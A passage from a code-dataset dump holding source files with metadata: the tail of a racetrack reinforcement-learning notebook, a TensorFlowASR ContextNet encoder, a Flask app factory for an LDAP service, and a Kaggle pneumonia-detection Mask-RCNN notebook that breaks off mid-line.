pi[idx] = track.tuple_to_action(a - np.array([1, 1]))\r\n\r\n# In[8]:\r\n\r\n\r\n# Run learned policy on test case\r\n\r\npos_map = np.zeros((x_size, y_size))\r\ntrack.reset()\r\nfor e in range(1000):\r\n s = track.get_state()\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n pos_map[s_x, s_y] += 1 # exploration map\r\n act = track.action_to_tuple(pi[s_x, s_y, s_vx, s_vy])\r\n track.take_action(act)\r\n if track.is_terminal_state(): break\r\n\r\nprint('Sample trajectory on learned policy:')\r\npos_map = (pos_map > 0).astype(np.float32)\r\npos_map += track.course # overlay track course\r\nplt.imshow(np.flipud(pos_map.T), cmap='hot', interpolation='nearest')\r\nplt.show()\r\n\r\n", "repo_name": "AnikHawk/AI-Lab", "sub_path": "Arc Consistency/SRTS.py", "file_name": "SRTS.py", "file_ext": "py", "file_size_in_byte": 10785, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.minimum", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 99, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.fliplr", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 177, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 262, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 263, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 303, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 303, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 311, "usage_type": "name"}, {"api_name": "numpy.flipud", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 312, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 318, "usage_type": "attribute"}, {"api_name": "numpy.ndindex", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 341, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 343, "usage_type": "name"}, {"api_name": "numpy.flipud", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}]} +{"seq_id": "44030322090", "text": "from typing import List\nimport tensorflow as tf\n\nfrom tensorflow_asr.utils import math_util\n\nL2 = tf.keras.regularizers.l2(1e-6)\n\n\ndef get_activation(\n activation: str = \"silu\",\n):\n activation = activation.lower()\n if activation in [\"silu\", \"swish\"]:\n return tf.nn.swish\n elif activation == \"relu\":\n return tf.nn.relu\n elif activation == \"linear\":\n return tf.keras.activations.linear\n else:\n raise ValueError(\"activation must be either 'silu', 'swish', 'relu' or 'linear'\")\n\n\nclass Reshape(tf.keras.layers.Layer):\n def call(self, inputs):\n return math_util.merge_two_last_dims(inputs)\n\n\nclass ConvModule(tf.keras.layers.Layer):\n def __init__(\n self,\n kernel_size: int = 3,\n strides: int = 1,\n filters: int = 256,\n activation: str = \"silu\",\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(ConvModule, self).__init__(**kwargs)\n self.strides = strides\n self.conv = tf.keras.layers.SeparableConv1D(\n filters=filters,\n kernel_size=kernel_size,\n strides=strides,\n padding=\"same\",\n depthwise_regularizer=kernel_regularizer,\n pointwise_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv\",\n )\n self.bn = tf.keras.layers.BatchNormalization(name=f\"{self.name}_bn\")\n self.activation = get_activation(activation)\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n outputs = self.conv(inputs, training=training)\n outputs = self.bn(outputs, training=training)\n outputs = self.activation(outputs)\n return outputs\n\n\nclass SEModule(tf.keras.layers.Layer):\n def __init__(\n self,\n kernel_size: int = 3,\n strides: int = 1,\n filters: int = 256,\n activation: str = \"silu\",\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(SEModule, self).__init__(**kwargs)\n self.conv = ConvModule(\n kernel_size=kernel_size,\n strides=strides,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv_module\",\n )\n self.activation = get_activation(activation)\n self.fc1 = tf.keras.layers.Dense(filters // 8, name=f\"{self.name}_fc1\")\n self.fc2 = tf.keras.layers.Dense(filters, name=f\"{self.name}_fc2\")\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n features, input_length = inputs\n outputs = self.conv(features, training=training)\n\n se = tf.divide(tf.reduce_sum(outputs, axis=1), tf.expand_dims(tf.cast(input_length, dtype=outputs.dtype), axis=1))\n se = self.fc1(se, training=training)\n se = self.activation(se)\n se = self.fc2(se, training=training)\n se = self.activation(se)\n se = tf.nn.sigmoid(se)\n se = tf.expand_dims(se, axis=1)\n\n outputs = tf.multiply(outputs, se)\n return outputs\n\n\nclass ConvBlock(tf.keras.layers.Layer):\n def __init__(\n self,\n nlayers: int = 3,\n kernel_size: int = 3,\n filters: int = 256,\n strides: int = 1,\n residual: bool = True,\n activation: str = \"silu\",\n alpha: float = 1.0,\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(ConvBlock, self).__init__(**kwargs)\n\n self.dmodel = filters\n self.time_reduction_factor = strides\n filters = int(filters * alpha)\n\n self.convs = []\n for i in range(nlayers - 1):\n self.convs.append(\n ConvModule(\n kernel_size=kernel_size,\n strides=1,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv_module_{i}\",\n )\n )\n\n self.last_conv = ConvModule(\n kernel_size=kernel_size,\n strides=strides,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv_module_{nlayers - 1}\",\n )\n\n self.se = SEModule(\n kernel_size=kernel_size,\n strides=1,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_se\",\n )\n\n self.residual = None\n if residual:\n self.residual = ConvModule(\n kernel_size=kernel_size,\n strides=strides,\n filters=filters,\n activation=\"linear\",\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_residual\",\n )\n\n self.activation = get_activation(activation)\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n features, input_length = inputs\n outputs = features\n for conv in self.convs:\n outputs = conv(outputs, training=training)\n outputs = self.last_conv(outputs, training=training)\n input_length = math_util.get_reduced_length(input_length, self.last_conv.strides)\n outputs = self.se([outputs, input_length], training=training)\n if self.residual is not None:\n res = self.residual(features, training=training)\n outputs = tf.add(outputs, res)\n outputs = self.activation(outputs)\n return outputs, input_length\n\n\nclass ContextNetEncoder(tf.keras.Model):\n def __init__(\n self,\n blocks: List[dict] = [],\n alpha: float = 1.0,\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(ContextNetEncoder, self).__init__(**kwargs)\n\n self.reshape = Reshape(name=f\"{self.name}_reshape\")\n\n self.blocks = []\n for i, config in enumerate(blocks):\n self.blocks.append(\n ConvBlock(\n **config,\n alpha=alpha,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_block_{i}\",\n )\n )\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n outputs, input_length = inputs\n outputs = self.reshape(outputs)\n for block in self.blocks:\n outputs, input_length = block([outputs, input_length], training=training)\n return outputs\n", "repo_name": "TensorSpeech/TensorFlowASR", "sub_path": "tensorflow_asr/models/encoders/contextnet.py", "file_name": "contextnet.py", "file_ext": "py", "file_size_in_byte": 7082, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 877, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.keras.regularizers.l2", "line_number": 6, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 6, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow_asr.utils.math_util.merge_two_last_dims", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow_asr.utils.math_util", "line_number": 25, "usage_type": "name"}, {"api_name": "tensorflow.keras", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.SeparableConv1D", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 41, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.divide", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 105, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 105, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 106, "usage_type": "call"}, {"api_name": "tensorflow.multiply", "line_number": 108, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tensorflow_asr.utils.math_util.get_reduced_length", "line_number": 191, "usage_type": "call"}, {"api_name": "tensorflow_asr.utils.math_util", "line_number": 191, "usage_type": "name"}, {"api_name": "tensorflow.add", "line_number": 195, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 200, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 203, "usage_type": "name"}]} +{"seq_id": "32921679262", "text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom flask import Flask\nfrom flask.logging import default_handler\nfrom redap.core import ldap, db, migrate\n\n\ndef create_app(package_name, *args, **kwargs):\n app = Flask(package_name, *args, instance_relative_config=True, **kwargs)\n\n # Fetch settings from config file\n app.config.from_object('redap.settings.core')\n app.config.from_object('redap.settings.ldap')\n\n # Init flask-ldapconn extension\n ldap.init_app(app)\n\n # Init SQLAlchemy\n db.init_app(app)\n migrate.init_app(app, db)\n\n if app.config['ENV'] == 'production':\n formatter = logging.Formatter(app.config['LOG_FORMAT'])\n\n handler = RotatingFileHandler('logs/application.log', maxBytes=10000, backupCount=3)\n handler.setLevel(logging.INFO)\n handler.setFormatter(formatter)\n\n app.logger.setLevel(logging.INFO)\n app.logger.addHandler(handler)\n app.logger.removeHandler(default_handler)\n\n # Check for errors upon request teardown\n @app.teardown_request\n def log_errors(error):\n if error is None:\n return\n\n app.logger.error(\"An error occurred while handling the request\", error)\n\n return app\n", "repo_name": "rbw/redap", "sub_path": "redap/factory.py", "file_name": "factory.py", "file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 27, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "redap.core.ldap.init_app", "line_number": 18, "usage_type": "call"}, {"api_name": "redap.core.ldap", "line_number": 18, "usage_type": "name"}, {"api_name": "redap.core.db.init_app", "line_number": 21, "usage_type": "call"}, {"api_name": "redap.core.db", "line_number": 21, "usage_type": "name"}, {"api_name": "redap.core.migrate.init_app", "line_number": 22, "usage_type": "call"}, {"api_name": "redap.core.db", "line_number": 22, "usage_type": "argument"}, {"api_name": "redap.core.migrate", "line_number": 22, "usage_type": "name"}, {"api_name": "logging.Formatter", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 27, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 28, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.logging.default_handler", "line_number": 33, "usage_type": "argument"}]} +{"seq_id": "10148034345", "text": "import os \nimport sys\nimport random\nimport math\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport json\nimport pydicom\nfrom imgaug import augmenters as iaa\nfrom tqdm import tqdm\nimport pandas as pd \nimport glob \n\n# ### First: Install Kaggle API for download competition data.\n\n# In[ ]:\n\n\nDATA_DIR = '/kaggle/input'\n\n# Directory to save logs and trained model\nROOT_DIR = '/kaggle/working'\n\n# ### MD.ai Annotator \n# \n# Additionally, If you are interested in augmenting the existing annotations, you can use the MD.ai annotator to view DICOM images, and create annotatios to be exported. \n# MD.ai annotator project URL for the Kaggle dataset: https://public.md.ai/annotator/project/LxR6zdR2/workspace\n# \n# **Annotator features**\n# - The annotator can be used to view DICOM images and create image and exam level annotations.\n# - You can apply the annotator to filter by label, adjudicate annotations, and assign annotation tasks to your team.\n# - Notebooks can be built directly within the annotator for rapid model development.\n# - The data wrangling is abstracted away by the interface and by our MD.ai library.\n# - Simplifies image annotation in order to widen the participation in the futrue of medical image deep learning.\n# \n# The annotator allows you to create initial annotations, build and run models, modify/finetune the annotations based on predicted values, and repeat. \n# The MD.ai python client library implements functions to easily download images and annotations and to prepare the datasets used to train the model for classification. See the following example notebook for parsing annotations and training using MD.ai annotator: \n# https://github.com/mdai/ml-lessons/blob/master/lesson3-rsna-pneumonia-detection-mdai-client-lib.ipynb \n# - MD.ai URL: https://www.md.ai \n# - MD.ai documentation URL: https://docs.md.ai/\n\n# ### Install Matterport's Mask-RCNN model from github.\n# See the [Matterport's implementation of Mask-RCNN](https://github.com/matterport/Mask_RCNN).\n\n# In[ ]:\n\n\nos.chdir('Mask_RCNN')\n#!python setup.py -q install\n\n# In[ ]:\n\n\n# Import Mask RCNN\nsys.path.append(os.path.join(ROOT_DIR, 'Mask_RCNN')) # To find local version of the library\nfrom mrcnn.config import Config\nfrom mrcnn import utils\nimport mrcnn.model as modellib\nfrom mrcnn import visualize\nfrom mrcnn.model import log\n\n# In[ ]:\n\n\ntrain_dicom_dir = os.path.join(DATA_DIR, 'stage_1_train_images')\ntest_dicom_dir = os.path.join(DATA_DIR, 'stage_1_test_images')\n\n# ### Some setup functions and classes for Mask-RCNN\n# \n# - dicom_fps is a list of the dicom image path and filenames \n# - image_annotions is a dictionary of the annotations keyed by the filenames\n# - parsing the dataset returns a list of the image filenames and the annotations dictionary\n\n# In[ ]:\n\n\ndef get_dicom_fps(dicom_dir):\n dicom_fps = glob.glob(dicom_dir+'/'+'*.dcm')\n return list(set(dicom_fps))\n\ndef parse_dataset(dicom_dir, anns): \n image_fps = get_dicom_fps(dicom_dir)\n image_annotations = {fp: [] for fp in image_fps}\n for index, row in anns.iterrows(): \n fp = os.path.join(dicom_dir, row['patientId']+'.dcm')\n image_annotations[fp].append(row)\n return image_fps, image_annotations \n\n# In[ ]:\n\n\n# The following parameters have been selected to reduce running time for demonstration purposes \n# These are not optimal \n\nclass DetectorConfig(Config):\n \"\"\"Configuration for training pneumonia detection on the RSNA pneumonia dataset.\n Overrides values in the base Config class.\n \"\"\"\n \n # Give the configuration a recognizable name \n NAME = 'pneumonia'\n \n # Train on 1 GPU and 8 images per GPU. We can put multiple images on each\n # GPU because the images are small. Batch size is 8 (GPUs * images/GPU).\n GPU_COUNT = 1\n IMAGES_PER_GPU = 8 \n \n BACKBONE = 'resnet50'\n \n NUM_CLASSES = 2 # background + 1 pneumonia classes\n \n IMAGE_MIN_DIM = 256\n IMAGE_MAX_DIM = 256\n RPN_ANCHOR_SCALES = (32, 64, 128, 256)\n TRAIN_ROIS_PER_IMAGE = 32\n MAX_GT_INSTANCES = 3\n DETECTION_MAX_INSTANCES = 3\n DETECTION_MIN_CONFIDENCE = 0.9\n DETECTION_NMS_THRESHOLD = 0.1\n\n STEPS_PER_EPOCH = 100\n \nconfig = DetectorConfig()\nconfig.display()\n\n# In[ ]:\n\n\nclass DetectorDataset(utils.Dataset):\n \"\"\"Dataset class for training pneumonia detection on the RSNA pneumonia dataset.\n \"\"\"\n\n def __init__(self, image_fps, image_annotations, orig_height, orig_width):\n super().__init__(self)\n \n # Add classes\n self.add_class('pneumonia', 1, 'Lung Opacity')\n \n # add images \n for i, fp in enumerate(image_fps):\n annotations = image_annotations[fp]\n self.add_image('pneumonia', image_id=i, path=fp, \n annotations=annotations, orig_height=orig_height, orig_width=orig_width)\n \n def image_reference(self, image_id):\n info = self.image_info[image_id]\n return info['path']\n\n def load_image(self, image_id):\n info = self.image_info[image_id]\n fp = info['path']\n ds = pydicom.read_file(fp)\n image = ds.pixel_array\n # If grayscale. Convert to RGB for consistency.\n if len(image.shape) != 3 or image.shape[2] != 3:\n image = np.stack((image,) * 3, -1)\n return image\n\n def load_mask(self, image_id):\n info = self.image_info[image_id]\n annotations = info['annotations']\n count = len(annotations)\n if count == 0:\n mask = np.zeros((info['orig_height'], info['orig_width'], 1), dtype=np.uint8)\n class_ids = np.zeros((1,), dtype=np.int32)\n else:\n mask = np.zeros((info['orig_height'], info['orig_width'], count), dtype=np.uint8)\n class_ids = np.zeros((count,), dtype=np.int32)\n for i, a in enumerate(annotations):\n if a['Target'] == 1:\n x = int(a['x'])\n y = int(a['y'])\n w = int(a['width'])\n h = int(a['height'])\n mask_instance = mask[:, :, i].copy()\n cv2.rectangle(mask_instance, (x, y), (x+w, y+h), 255, -1)\n mask[:, :, i] = mask_instance\n class_ids[i] = 1\n return mask.astype(np.bool), class_ids.astype(np.int32)\n\n# ### Examine the annotation data, parse the dataset, and view dicom fields\n\n# In[ ]:\n\n\n# training dataset\nanns = pd.read_csv(os.path.join(DATA_DIR, 'stage_1_train_labels.csv'))\nanns.head()\n\n# In[ ]:\n\n\nimage_fps, image_annotations = parse_dataset(train_dicom_dir, anns=anns)\n\n# In[ ]:\n\n\nds = pydicom.read_file(image_fps[0]) # read dicom image from filepath \nimage = ds.pixel_array # get image array\n\n# In[ ]:\n\n\n# show dicom fields \nds\n\n# In[ ]:\n\n\n# Original DICOM image size: 1024 x 1024\nORIG_SIZE = 1024\n\n# ### Split the data into training and validation datasets\n# **Note: We have only used only a portion of the images for demonstration purposes. See comments below.**\n# \n# - To use all the images do: image_fps_list = list(image_fps)\n# - Or change the number of images from 100 to a custom number\n\n# In[ ]:\n\n\n######################################################################\n# Modify this line to use more or fewer images for training/validation. \n# To use all images, do: image_fps_list = list(image_fps)\nimage_fps_list = list(image_fps[:1000]) \n#####################################################################\n\n# split dataset into training vs. validation dataset \n# split ratio is set to 0.9 vs. 0.1 (train vs. validation, respectively)\nsorted(image_fps_list)\nrandom.seed(42)\nrandom.shuffle(image_fps_list)\n\nvalidation_split = 0.1\nsplit_index = int((1 - validation_split) * len(image_fps_list))\n\nimage_fps_train = image_fps_list[:split_index]\nimage_fps_val = image_fps_list[split_index:]\n\nprint(len(image_fps_train), len(image_fps_val))\n\n# ### Create and prepare the training dataset using the DetectorDataset class.\n\n# In[ ]:\n\n\n# prepare the training dataset\ndataset_train = DetectorDataset(image_fps_train, image_annotations, ORIG_SIZE, ORIG_SIZE)\ndataset_train.prepare()\n\n# ### Let's look at a sample annotation. We see a bounding box with (x, y) of the the top left corner as well as the width and height.\n\n# In[ ]:\n\n\n# Show annotation(s) for a DICOM image \ntest_fp = random.choice(image_fps_train)\nimage_annotations[test_fp]\n\n# In[ ]:\n\n\n# prepare the validation dataset\ndataset_val = DetectorDataset(image_fps_val, image_annotations, ORIG_SIZE, ORIG_SIZE)\ndataset_val.prepare()\n\n# ### Display a random image with bounding boxes\n\n# In[ ]:\n\n\n# Load and display random samples and their bounding boxes\n# Suggestion: Run this a few times to see different examples. \n\nimage_id = random.choice(dataset_train.image_ids)\nimage_fp = dataset_train.image_reference(image_id)\nimage = dataset_train.load_image(image_id)\nmask, class_ids = dataset_train.load_mask(image_id)\n\nprint(image.shape)\n\nplt.figure(figsize=(10, 10))\nplt.subplot(1, 2, 1)\nplt.imshow(image[:, :, 0], cmap='gray')\nplt.axis('off')\n\nplt.subplot(1, 2, 2)\nmasked = np.zeros(image.shape[:2])\nfor i in range(mask.shape[2]):\n masked += image[:, :, 0] * mask[:, :, i]\nplt.imshow(masked, cmap='gray')\nplt.axis('off')\n\nprint(image_fp)\nprint(class_ids)\n\n# In[ ]:\n\n\nmodel = modellib.MaskRCNN(mode='training', config=config, model_dir=ROOT_DIR)\n\n# ### Image Augmentation. Try finetuning some variables to custom values\n\n# In[ ]:\n\n\n# Image augmentation \naugmentation = iaa.SomeOf((0, 1), [\n iaa.Fliplr(0.5),\n iaa.Affine(\n scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)},\n translate_percent={\"x\": (-0.2, 0.2), \"y\": (-0.2, 0.2)},\n rotate=(-25, 25),\n shear=(-8, 8)\n ),\n iaa.Multiply((0.9, 1.1))\n])\n\n# ### Now it's time to train the model. Note that training even a basic model can take a few hours. \n# \n# Note: the following model is for demonstration purpose only. We have limited the training to one epoch, and have set nominal values for the Detector Configuration to reduce run-time. \n# \n# - dataset_train and dataset_val are derived from DetectorDataset \n# - DetectorDataset loads images from image filenames and masks from the annotation data\n# - model is Mask-RCNN\n\n# In[ ]:\n\n\nNUM_EPOCHS = 1\n\n# Train Mask-RCNN Model \nimport warnings \nwarnings.filterwarnings(\"ignore\")\nmodel.train(dataset_train, dataset_val, \n learning_rate=config.LEARNING_RATE, \n epochs=NUM_EPOCHS, \n layers='all',\n augmentation=augmentation)\n\n# In[ ]:\n\n\n# select trained model \ndir_names = next(os.walk(model.model_dir))[1]\nkey = config.NAME.lower()\ndir_names = filter(lambda f: f.startswith(key), dir_names)\ndir_names = sorted(dir_names)\n\nif not dir_names:\n import errno\n raise FileNotFoundError(\n errno.ENOENT,\n \"Could not find model directory under {}\".format(self.model_dir))\n \nfps = []\n# Pick last directory\nfor d in dir_names: \n dir_name = os.path.join(model.model_dir, d)\n # Find the last checkpoint\n checkpoints = next(os.walk(dir_name))[2]\n checkpoints = filter(lambda f: f.startswith(\"mask_rcnn\"), checkpoints)\n checkpoints = sorted(checkpoints)\n if not checkpoints:\n print('No weight files in {}'.format(dir_name))\n else: \n \n checkpoint = os.path.join(dir_name, checkpoints[-1])\n fps.append(checkpoint)\n\nmodel_path = sorted(fps)[-1]\nprint('Found model {}'.format(model_path))\n\n# In[ ]:\n\n\nclass InferenceConfig(DetectorConfig):\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\ninference_config = InferenceConfig()\n\n# Recreate the model in inference mode\nmodel = modellib.MaskRCNN(mode='inference', \n config=inference_config,\n model_dir=ROOT_DIR)\n\n# Load trained weights (fill in path to trained weights here)\nassert model_path != \"\", \"Provide path to trained weights\"\nprint(\"Loading weights from \", model_path)\nmodel.load_weights(model_path, by_name=True)\n\n# In[ ]:\n\n\n# set color for class\ndef get_colors_for_class_ids(class_ids):\n colors = []\n for class_id in class_ids:\n if class_id == 1:\n colors.append((.941, .204, .204))\n return colors\n\n# ### How does the predicted box compared to the expected value? Let's use the validation dataset to check. \n# \n# Note that we trained only one epoch for **demonstration purposes ONLY**. You might be able to improve performance running more epochs. \n\n# In[ ]:\n\n\n# Show few example of ground truth vs. predictions on the validation dataset \ndataset = dataset_val\nfig = plt.figure(figsize=(10, 30))\n\nfor i in range(4):\n\n image_id = random.choice(dataset.image_ids)\n \n original_image, image_meta, gt_class_id, gt_bbox, gt_mask =\\\n modellib.load_image_gt(dataset_val, inference_config, \n image_id, use_mini_mask=False)\n \n print(original_image.shape)\n plt.subplot(6, 2, 2*i + 1)\n visualize.display_instances(original_image, gt_bbox, gt_mask, gt_class_id, \n dataset.class_names,\n colors=get_colors_for_class_ids(gt_class_id), ax=fig.axes[-1])\n \n plt.subplot(6, 2, 2*i + 2)\n results = model.detect([original_image]) #, verbose=1)\n r = results[0]\n visualize.display_instances(original_image, r['rois'], r['masks'], r['class_ids'], \n dataset.class_names, r['scores'], \n colors=get_colors_for_class_ids(r['class_ids']), ax=fig.axes[-1])\n\n# In[ ]:\n\n\n# Get filenames of test dataset DICOM images\ntest_image_fps = get_dicom_fps(test_dicom_dir)\n\n# ### Final steps - Create the submission file\n\n# In[ ]:\n\n\n# Make predictions on test images, write out sample submission \ndef predict(image_fps, filepath='submission.csv', min_conf=0.95): \n \n # assume square image\n resize_factor = ORIG_SIZE / config.IMAGE_SHAPE[0]\n #resize_factor = ORIG_SIZE \n with open(filepath, 'w') as file:\n for image_id in tqdm(image_fps): \n ds = pydicom.read_file(image_id)\n image = ds.pixel_array\n # If grayscale. Convert to RGB for consistency.\n if len(image.shape) != 3 or image.shape[2] != 3:\n image = np.stack((image,) * 3, -1) \n image, window, scale, padding, crop = utils.resize_image(\n image,\n min_dim=config.IMAGE_MIN_DIM,\n min_scale=config.IMAGE_MIN_SCALE,\n max_dim=config.IMAGE_MAX_DIM,\n mode=config.IMAGE_RESIZE_MODE)\n \n patient_id = os.path.splitext(os.path.basename(image_id))[0]\n\n results = model.detect([image])\n r = results[0]\n\n out_str = \"\"\n out_str += patient_id \n out_str += \",\"\n assert( len(r['rois']) == len(r['class_ids']) == len(r['scores']) )\n if len(r['rois']) == 0: \n pass\n else: \n num_instances = len(r['rois'])\n \n for i in range(num_instances): \n if r['scores'][i] > min_conf: \n out_str += ' '\n out_str += str(round(r['scores'][i], 2))\n out_str += ' '\n\n # x1, y1, width, height \n x1 = r['rois'][i][1]\n y1 = r['rois'][i][0]\n width = r['rois'][i][3] - x1 \n height = r['rois'][i][2] - y1 \n bboxes_str = \"{} {} {} {}\".format(x1*resize_factor, y1*resize_factor, \\\n width*resize_factor, height*resize_factor) \n# bboxes_str = \"{} {} {} {}\".format(x1, y1, \\\n# width, height)\n out_str += bboxes_str\n\n file.write(out_str+\"\\n\")\n\n# In[ ]:\n\n\n# predict only the first 50 entries\nsubmission_fp = os.path.join(ROOT_DIR, 'submission.csv')\nprint(submission_fp)\npredict(test_image_fps, filepath=submission_fp)\n\n# In[ ]:\n\n\noutput = pd.read_csv(submission_fp, names=['patientId', 